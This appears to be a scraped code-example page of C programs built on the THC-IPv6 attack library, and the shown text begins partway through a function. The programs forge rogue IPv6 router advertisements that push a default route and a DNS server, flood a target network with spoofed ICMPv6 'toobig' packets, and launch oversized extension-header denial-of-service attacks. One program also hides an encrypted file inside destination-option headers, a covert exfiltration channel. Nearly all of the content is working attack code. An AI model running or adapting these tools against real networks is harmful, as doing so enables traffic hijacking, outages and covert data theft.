      exit(-1);
    }
  if (ip6 == NULL)
    if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) {
      fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface);
      exit(-1);
    }
//  if (dns == NULL)
//    dns = thc_resolve6("ff02::fb");

  frint = interface;
  frip6 = ip6;
  frmac = mac6;
  frbuf = buf;
  frbuf2 = buf2;
  frbuf2len = sizeof(buf2);

  memset(buf, 0, sizeof(buf));
  memset(buf2, 0, sizeof(buf2));
  memset(buf3, 0, sizeof(buf3));

  if (llife > 0xffff)
    llife = 0xffff;
  llife = (llife | 0xff000000);
  if (prio == 2)
    llife = (llife | 0x00080000);
  else if (prio == 0)
    llife = (llife | 0x00180000);
  else if (prio != 1)
    llife = (llife | 0x00100000);
  
  llife = (llife | (flags << 16));

  buf[0] = reach / 16777216;
  buf[1] = (reach % 16777216) / 65536;
  buf[2] = (reach % 65536) / 256;
  buf[3] = reach % 256;
  buf[4] = trans / 16777216;
  buf[5] = (trans % 16777216) / 65536;
  buf[6] = (trans % 65536) / 256;
  buf[7] = trans % 256;

  // option mtu
  buf[8] = 5;
  buf[9] = 1;
  buf[12] = mtu / 16777216;
  buf[13] = (mtu % 16777216) / 65536;
  buf[14] = (mtu % 65536) / 256;
  buf[15] = mtu % 256;
  i = 16;

  // mac address option
  buf[i++] = 1;
  buf[i++] = 1;
  memcpy(buf + i, mac6, 6);
  i += 6;

  // option prefix, put all in
  if (pcnt > 0)
    for (j = 0; j < pcnt; j++) {
      buf[i++] = 3;
      buf[i++] = 4;
      buf[i++] = pbuf[j][0];    // prefix length
      buf[i++] = 128 + 64;
      buf[i++] = plife / 16777216;
      buf[i++] = (plife % 16777216) / 65536;
      buf[i++] = (plife % 65536) / 256;
      buf[i++] = plife % 256;
      buf[i++] = (plife / 2) / 16777216;
      buf[i++] = ((plife / 2) % 16777216) / 65536;
      buf[i++] = ((plife / 2) % 65536) / 256;
      buf[i++] = (plife / 2) % 256;
      i += 4;                   // + 4 bytes reserved
      memcpy(&buf[i], (char *) &pbuf[j][1], 16);
      i += 16;
    }
  // route option, put all in
  if (rcnt > 0)
    for (j = 0; j < rcnt; j++) {
      buf[i++] = 0x18;          // routing entry option type
      buf[i++] = 0x03;          // length 3 == 24 bytes
      buf[i++] = rbuf[j][0];    // prefix length
      if (prio == 2)
        buf[i++] = 0x08;          // priority, highest of course
      else if (prio == 1)
        buf[i++] = 0x00;
      else if (prio == 0)
        buf[i++] = 0x18;
      else
        buf[i++] == 0x10;
      buf[i++] = rlife / 16777216;
      buf[i++] = (rlife % 16777216) / 65536;
      buf[i++] = (rlife % 65536) / 256;
      buf[i++] = rlife % 256;
      memcpy((char *) &buf[i], (char *) &rbuf[j][1], 16);       // network
      i += 16;
    }
  // dns option
  if (dcnt > 0)
    for (j = 0; j < dcnt; j++) {
      buf[i++] = 0x19;          // dns option type
      buf[i++] = 0x03;          // length
      i += 2;                   // reserved
      buf[i++] = dlife / 16777216;
      buf[i++] = (dlife % 16777216) / 65536;
      buf[i++] = (dlife % 65536) / 256;
      buf[i++] = dlife % 256;
      memcpy(buf + i, dbuf[j], 16);     // dns server
      i += 16;
    }
    
  // dns searchlist option
  if (searchlist != NULL) {
    buf[i] = 31;
    buf[i + 4] = dlife / 16777216;
    buf[i + 5] = (dlife % 16777216) / 65536;
    buf[i + 6] = (dlife % 65536) / 256;
    buf[i + 7] = dlife % 256;
    if (searchlist[strlen(searchlist) - 1] == '.')
      searchlist[strlen(searchlist) - 1] = 0;
    m = 0;
    while ((ptr = strstr(searchlist, ".,")) != NULL) {
      m = strlen(ptr);
      for (l = 1; l < m; l++)
        ptr[l - 1] = ptr[l];
      ptr[m - 1] = 0;
    }
    l = 0;
    m = 0;
    j = strlen(searchlist);
    do {
      k = 0;
      ptr = index(&searchlist[l], '.');
      if (ptr == NULL || (index(&searchlist[l], ',') != NULL && (char*)ptr > (char*)index(&searchlist[l], ','))) {
        k = 1;
        ptr = index(&searchlist[l], ',');
      }
      if (ptr != NULL)
        *ptr = 0;
      n = strlen(&searchlist[l]);

      buf[i + 8 + m] = n;
      memcpy(&buf[i + 8 + m + 1], &searchlist[l], n);

      if (ptr == NULL)
        l = j;
      else
        l += 1 + n;

      m += 1 + n;

      if (k || ptr == NULL)
        m++; // end of domain entry
    } while (l < j && ptr != NULL);
    if (m % 8 > 0)
      m = ( (m / 8) + 1 ) * 8;
    buf[i + 1] = m/8 + 1;
    i += m + 8;
  }

  frbuflen = i;

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
    return -1;

  if (do_hop) {
    type = NXT_HBH;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
      return -1;
  }
  if (do_frag) {
    type = NXT_FRAG;
    for (j = 0; i < do_frag; j++)
      if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0)
        return -1;
  }

  if (do_dst) {
    if (type == NXT_ICMP6)
      type = NXT_DST;
    if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
      return -1;
  }
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, llife, buf, i, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
    return -1;
  frhdr = (thc_ipv6_hdr *) pkt;
//printf("DEBUG: RA size is %d bytes, do_dst %d, do_overlap %d\n", i + 8, do_dst, do_overlap);

  // init pcap
  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  printf("Starting to advertise router (Press Control-C to end) ...\n");
  while (sent < to_send || to_send > 255) {
    if (do_dst) {
      thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232);
    } else if (do_overlap) {
      if (do_overlap == 1)
        thc_send_as_overlapping_first_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
      else
        thc_send_as_overlapping_last_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
    } else {
      thc_send_pkt(interface, pkt, &pkt_len);
    }
    while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
    sent++;
    if (sent != to_send || to_send > 255)
      sleep(interval);
  }
  return 0; // never reached
}
Example #4
0
int main(int argc, char *argv[]) {
  char *interface, *ptr, buf2[8];
  unsigned char *dst = NULL, *dstmac = NULL, *src = NULL, *srcmac = NULL;
  int i, offset = 14, type = ICMP6_TOOBIG, alert = 0, randsrc = 0, do_crc = 1, maxsize = 160;
  unsigned char *pkt = NULL, ip6[8];
  int pkt_len = 0, count = 0;
  thc_ipv6_hdr *hdr;
  unsigned int filler = IDS_STRING, mychecksum;
  unsigned char offender[1452] = { 0x60, 0x00, 0x00, 0x00, 0x01, 0xcd, 0x3a, 0x3f,
                               0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
                               0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
                               0x20, 0x03, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04,
                               0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04,
                               0x80, 0x00, 0xed, 0xc5, 0xfa, 0xce, 0xba, 0xbe,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 };

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
  
   while ((i = getopt(argc, argv, "acpPTUrRs:m")) >= 0) {
     switch(i) {
       case 'a':
         alert = 8;
         break;
       case 'c':
         do_crc = 0;
         break;
       case 'm':
         maxsize = -1;
         break;
       case 'p':
         type = ICMP6_ECHOREQUEST;
         break;
       case 'P':
         type = ICMP6_ECHOREPLY;
         break;
       case 'T':
         type = ICMP6_TTLEXEED;
         break;
       case 'U':
         type = ICMP6_UNREACH;
         break;
       case 'r':
         randsrc = 8;
         break;
       case 'R':
         randsrc = 1;
         break;
       case 's':
         src = thc_resolve6(optarg);
         break;
       default:
         fprintf(stderr, "Error: unknown option -%c\n", i);
         exit(-1);
     }
   }

  if (argc - optind < 2)
    help(argv[0]);

  interface = argv[optind];

  if ((ptr = index(argv[optind + 1], '/')) != NULL)
    *ptr = 0;
  if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
    fprintf(stderr, "Error: Can not resolve %s\n", argv[optind + 1]);
    exit(-1);
  }

  if ((srcmac = thc_get_own_mac(interface)) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  
  if (src == NULL)
    if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL || (src[0] == 0xfe && src[1] == 0x80)) {
      fprintf(stderr, "Error: no global IPv6 address configured on interface %s\n", interface);
      exit(-1);
    }
  
  if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) {
    fprintf(stderr, "Error: can not find a route to target %s\n", argv[2]);
    exit(-1);
  }
  
  if (maxsize == -1)
    maxsize = thc_get_mtu(interface) - 48 - alert;

  if (maxsize > sizeof(offender))
    maxsize = sizeof(offender);

  for (i = 0; i < ((sizeof(offender) - 48) / 4); i++)
    memcpy(offender + 48 + i*4, (char*) &filler + _TAKE4, 4);
  memcpy(offender + 8, dst, 16);

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 255, 0, 0, 0, 0)) == NULL)
    return -1;
  if (alert) {
    memset(buf2, 0, sizeof(buf2));
    buf2[0] = 5;
    buf2[1] = 2;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0)
      return -1;
  }
  if (thc_add_icmp6(pkt, &pkt_len, type, 0, 1280, offender, maxsize, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
    return -1;
  hdr = (thc_ipv6_hdr *) pkt;
  
  if (do_hdr_size)
    offset = do_hdr_size;

  printf("Starting to flood target network with toobig %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
  while (1) {

    for (i = 4; i < 8; i++)
      ip6[i] = rand() % 256;

    memcpy(hdr->pkt + offset + 32 + 4, ip6 + 4, 4);
    memcpy(hdr->pkt + offset + 40 + 8 + 8 + 8 + 4 + alert, ip6 + 4, 4);
    
    if (randsrc) {
      for (i = randsrc; i < 16; i++)
        hdr->pkt[offset + 8 + i] = rand() % 256;
    }
    
    if (do_crc) {
      hdr->pkt[offset + 42 + alert] = 0;
      hdr->pkt[offset + 43 + alert] = 0;
      mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40 + alert, pkt_len - offset - 40 - alert);
      hdr->pkt[offset + 42 + alert] = mychecksum / 256;
      hdr->pkt[offset + 43 + alert] = mychecksum % 256;
    }

    while (thc_send_pkt(interface, pkt, &pkt_len) < 0)
      usleep(1);

    count++;
    if (count % 1000 == 0)
      printf(".");
  }
  return 0;
}
Example #5
0
int main(int argc, char *argv[]) {
  int test = 0, count = 1, tmplen;
  unsigned char buf[65536], bla[1500], tests[256];
  unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
  unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
  thc_ipv6_hdr *hdr;
  int i, j, k, srcmtu, fragsize;
  unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
  int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
  char *interface;
  thc_ipv6_hdr *ipv6;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  interface = argv[1];
  if ((dst6 = thc_resolve6(argv[2])) == NULL) {
    fprintf(stderr, "Error: invalid target: %s\n", argv[2]);
    exit(-1);
  }
  //route6 = thc_resolve6("2a01::");
  memcpy(ldst6, dst6, 16);
  memset(ldst6 + 2, 0, 6);
  ldst6[0] = 0xfe;
  ldst6[1] = 0x80;
  mcast6 = thc_resolve6("ff02::1");
  if (argc >= 4)
    test = atoi(argv[3]);
  memset(null_buffer, 0, sizeof(null_buffer));

  src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
    fprintf(stderr, "Error: invalid interface: %s\n", interface);
    exit(-1);
  }
  srcmac = thc_get_own_mac(interface);
  if (rawmode == 0) {
    if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
      fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
      exit(-1);
    }
  } else
    dstmac = null_buffer;
  if ((srcmtu = thc_get_mtu(interface)) <= 0) {
    fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
    exit(-1);
  }
  fragsize = ((srcmtu - 62) / 8) * 8;

  setvbuf(stdout, NULL, _IONBF, 0);
  memset(buf, 0, sizeof(buf));
  memset(tests, 0, sizeof(tests));
  memset(bla, 0, sizeof(bla));

  if (test < 1 || test > MAX_TEST) {
    printf("%s %s (c) 2013 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE);
    printf("Syntax: %s interface destination test-case-number\n\n", argv[0]);
    printf("The following test cases are currently implemented:\n");
    printf("  1 : large hop-by-hop header with router-alert and filled with unknown options\n");
    printf("  2 : large destination header filled with unknown options\n");
    exit(0);
  }

  printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]);
  printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n");

  /********************** TEST CASES ************************/

  if (test == count) {          // 1432
    printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 5;
    buf[1] = 2;
    j = 4;
    i = 2;
    while (j <= 1408) {
      k = (i % 63) + 1;
      buf[j] = k;
      switch (k) {
      case 38:                 // quickstart
        buf[j + 1] = 6;         // length
        buf[j + 2] = 1;         // request type + rate
        buf[j + 3] = 60;        //qs-ttl
        buf[j + 4] = 8;         // nonce
        j += 8;
        break;
      case 5:                  // prevent router alert option twice
        buf[j] = 1;
        // fall through
      default:
        buf[j + 1] = 2;
        j += 4;
      }
      j += buf[j + 1] + 2;
      i++;
    }
    for (i = 1; i < 236; i++) {
      buf[i * 6 - 2] = (i % 63) + 1;
      buf[i * 6 - 1] = 4;
    }
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 1416) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {          // 1432
    printf("Test %d: large destination header filled with unknown options.\n", count);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    for (i = 1; i < 237; i++) {
      buf[6 + i * 6] = (i % 63) + 1;
      buf[5 + i * 6] = 4;
    }
    if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {          // 1432
    // code
  }
  count++;


  /******************* END OF TESTCASES ***************************/

  count = 0;
  while (1) {
    thc_send_pkt(interface, pkt, &pkt_len);
    usleep(1);
    count++;
    if (count % 1000 == 0)
      printf(".");
  }

  return 0;
}
Example #6
0
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL, rbuf[3570], wbuf[3570], buf[4000];
  unsigned char *src6 = NULL, *dst6 = NULL, srcmac[6] = "", *mac = srcmac, *dmac;
  int pkt1_len = 0, flags = 0, i = 0, mtu = 0, bytes, seq = 0, id, rounds, wbytes, bufsize = 0, send = 2, num = 0;
  char *interface, *key = NULL, hash[20], vec[8] = { 0, 0, 0, 0, 0, 0, 0, 0 };;
  int rawmode = 0, tcp_port = -1;
  FILE *f;
  BF_KEY bfkey;

  if (argc < 4 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "rm:k:s:")) >= 0) {
    switch (i) {
    case 'r':
      rawmode = 1;
      thc_ipv6_rawmode(1);
      break;
    case 'k':
      key = optarg;
      break;
    case 'm':
      mtu = atoi(optarg);
      break;
    case 's':
      send = atoi(optarg);
      break;
    default:
      exit(-1);
    }
  }

  if (argc < optind + 2) {
    fprintf(stderr, "Error: Not enough parameters!\n");
    help(argv[0]);
  }

  interface = argv[optind];
  dst6 = thc_resolve6(argv[optind + 1]);
  if ((f = fopen(argv[optind + 2], "r")) == NULL) {
    fprintf(stderr, "Error: file %s not found\n", argv[optind + 2]);
    exit(-1);
  }
  if (argc >= optind + 4 && argv[optind + 3] != NULL)
    tcp_port = atoi(argv[optind + 3]);

  if (mtu == 0)
    mtu = thc_get_mtu(interface);
  if (mtu <= 1000) {
    fprintf(stderr, "Error: MTU of interface %s must be at least 1000 bytes\n", interface);
    exit(-1);
  }
  mac = thc_get_own_mac(interface);
  src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  if ((dmac = thc_get_mac(interface, src6, dst6)) == NULL) {
    fprintf(stderr, "Error: can not get MAC for target\n");
    exit(-1);
  }
  srand(getpid());
  mtu -= 128;
  if (mtu % 255 == 0)
    i = 2 * (mtu / 255);
  else
    i = 2 + 2 * (mtu / 255);
  mtu = mtu - i;
  if ((mtu + i + 14) % 8 > 0)
    mtu = (((mtu + i + 14) / 8) * 8) - (i + 14);
  if (mtu > 14 * 255)
    mtu = 14 * 255;
  if (key != NULL) {
    memset(&bfkey, 0, sizeof(bfkey));
    SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash);
    BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash);
    memset(vec, 0, sizeof(vec));
    num = 0;
  }

  id = rand();
  buf[0] = 16;
  buf[1] = 4;
  memcpy(buf + 2, (char *) &id, 4);
  buf[6] = 17;
  buf[7] = 4;

  while ((bytes = fread(rbuf, 1, mtu, f)) > 0) {
    seq++;
    if (key != NULL) {
      BF_cfb64_encrypt((unsigned char *) rbuf, (unsigned char *) wbuf, bytes, &bfkey, (unsigned char *) vec, &num, BF_ENCRYPT);
      memcpy(rbuf, wbuf, bytes);
    }
    memcpy(buf + 8, (char *) &seq, 4);
    bufsize = 12;
    rounds = bytes / 255;
    for (i = 0; i <= rounds; i++) {
      buf[bufsize] = i + 18;
      if (i == rounds)
        wbytes = bytes % 255;
      else
        wbytes = 255;
      buf[bufsize + 1] = wbytes;
      memcpy(buf + bufsize + 2, rbuf + 255 * i, wbytes);
      bufsize += wbytes + 2;
    }
    if (bytes < mtu) {
      buf[bufsize] = 0x1f;
      buf[bufsize + 1] = 0;
      bufsize = bufsize + 2;
    }

    if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, bufsize))
      return -1;
    if (tcp_port == -1) {
      if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_ECHOREQUEST, 0, flags, NULL, 0, 0) < 0)
        return -1;
    } else {
      if (thc_add_tcp(pkt1, &pkt1_len, (rand() % 45536) + 10000, tcp_port, rand(), 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
        return -1;
    }
    if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) {
      fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
      exit(-1);
    }
    printf("Sending packet seq# %d\n", seq);
    for (i = 0; i < send; i++) {
      thc_send_pkt(interface, pkt1, &pkt1_len);
      usleep(100);
    }
  }
  printf("All sent.\n");
  return 0;
}
Example #7
0
int main(int argc, char *argv[]) {
  char *routerip, *interface, mac[16] = "";
  unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
  unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
  unsigned char *dst = thc_resolve6("ff02::1");
  unsigned char *dstmac = thc_get_multicast_mac(dst);
  unsigned char *dns;
  int size, mtu = 1500, i, j, k, cnt;
  unsigned char *pkt = NULL;
  int pkt_len = 0;
  int rawmode = 0;
  pcap_t *p;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "FHDr")) >= 0) {
    switch (i) {
    case 'r':
      thc_ipv6_rawmode(1);
      rawmode = 1;
      break;
    case 'F':
      do_frag++;
      break;
    case 'H':
      do_hop = 1;
      break;
    case 'D':
      do_dst = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 2)
    help(argv[0]);

  if (do_hdr_size)
    myoff = do_hdr_size;
  frbuf = buf;
  frbuf2 = buf2;
  frbuf2len = sizeof(buf2);
  memset(mac, 0, sizeof(mac));
  interface = argv[optind];
  mtu = thc_get_mtu(interface);
  if (argc - optind >= 5)
    mtu = atoi(argv[optind + 4]);
  if (argc - optind >= 7 && (ptr = argv[optind + 5]) != NULL)
    sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
           (unsigned int *) &mac[5]);
  else
    mac6 = thc_get_own_mac(interface);

  if (argc - optind >= 4 && argv[optind + 3] != NULL)
    ip6 = thc_resolve6(argv[optind + 3]);
  else
    ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  frip6 = ip6;
  frint = interface;
  frmac = mac6;

  if (argc - optind >= 4 && argv[optind + 2] != NULL)
    dns = thc_resolve6(argv[optind + 2]);
  else
    dns = thc_resolve6("ff02::fb");

  routerip = argv[optind + 1];
  if (routerip == NULL || (ptr = index(routerip, '/')) == NULL) {
    printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
    exit(-1);
  }
  *ptr++ = 0;
  size = atoi(ptr);

  routerip6 = thc_resolve6(routerip);
  route6 = thc_resolve6(routerip);

  if (routerip6 == NULL || size < 1 || size > 128) {
    fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[optind + 1]);
    exit(-1);
  }
  if (size < 48 || size > 64)
    fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);
  if (dns == NULL) {
    fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[optind + 2]);
    exit(-1);
  }
  if (ip6 == NULL) {
    fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[optind + 3]);
    exit(-1);
  }
  if (mtu < 1 || mtu > 65536) {
    fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[optind + 4]);
    exit(-1);
  }
  if (mtu < 1228 || mtu > 1500)
    fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu);
  if (mac6 == NULL) {
    fprintf(stderr, "Error: mac address in invalid\n");
    exit(-1);
  }
  memset(buf, 0, sizeof(buf));
  memset(buf2, 0, sizeof(buf2));
  memset(buf3, 0, sizeof(buf3));

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  i = 128 - size;
  j = i / 8;
  k = i % 8;
  if (k > 0)
    j++;
  memset(route6 + 16 - j, 0, j);
  if (k > 0)
    route6[17 - j] = (route6[17 - j] >> (8 - k)) << (8 - k);

//  buf[3] = 250; // 0-3: reachable timer
  buf[6] = 4;                   // 4-7: retrans timer
  // option mtu
  buf[8] = 5;
  buf[9] = 1;
  buf[12] = mtu / 16777216;
  buf[13] = (mtu % 16777216) / 65536;
  buf[14] = (mtu % 65536) / 256;
  buf[15] = mtu % 256;
  // option prefix
  buf[16] = 3;
  buf[17] = 4;
  buf[18] = size;               // prefix length
  buf[19] = 128 + 64;
  memset(&buf[20], 17, 4);
  memset(&buf[24], 4, 4);
  memcpy(&buf[32], route6, 16);

  i = 48;
  // mac address option
  buf[i++] = 1;
  buf[i++] = 1;
  memcpy(buf + i, mac6, 6);
  i += 6;

  // default route routing option
  buf[i++] = 0x18;              // routing entry option type
  buf[i++] = 0x03;              // length 3 == 24 bytes
  buf[i++] = 0x00;              // prefix length
  buf[i++] = 0x08;              // priority, highest of course
  i += 2;                       // 52-53 unknown
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x11;              // lifetime, word
  i += 16;                      // 56-71 address, all zeros for default

  // specific route routing option 2000::/3
  buf[i++] = 0x18;              // routing entry option type
  buf[i++] = 0x03;              // length 3 == 24 bytes
  buf[i++] = 0x03;              // prefix length
  buf[i++] = 0x08;              // priority, highest of course
  i += 2;                       // 52-53 unknown
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x20;              // 56-71 address: 2000::
  i += 15;

  // specific route routing option 2000::/3
  buf[i++] = 0x18;              // routing entry option type
  buf[i++] = 0x03;              // length 3 == 24 bytes
  buf[i++] = 0x07;              // prefix length
  buf[i++] = 0x08;              // priority, highest of course
  i += 2;                       // 52-53 unknown
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0xfc;              // 56-71 address: fc::
  i += 15;

  // dns option
  buf[i++] = 0x19;              // dns option type
  buf[i++] = 0x03;              // length
  i += 2;                       // 74-75 reserved
  memset(buf + i, 1, 4);        // validity time
  i += 4;
  memcpy(buf + i, dns, 16);     // dns server
  i += 16;

  frbuflen = i;

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
    return -1;

  if (do_hop) {
    type = NXT_HBH;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
      return -1;
  }
  if (do_frag) {
    type = NXT_FRAG;
    for (i = 0; i <= do_frag; i++)
      if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
        return -1;
  }
  if (do_dst) {
    if (type == NXT_ICMP6)
      type = NXT_DST;
    if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
      return -1;
  }
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
    return -1;
  frhdr = (thc_ipv6_hdr *) pkt;

  // init pcap

  printf("Starting to advertise router %s (Press Control-C to end) ...\n", argv[optind + 1]);
  while (1) {
    if (do_dst) {
      thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240);
    } else {
      thc_send_pkt(interface, pkt, &pkt_len);
    }
    while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
    sleep(5);
  }
  return 0;
}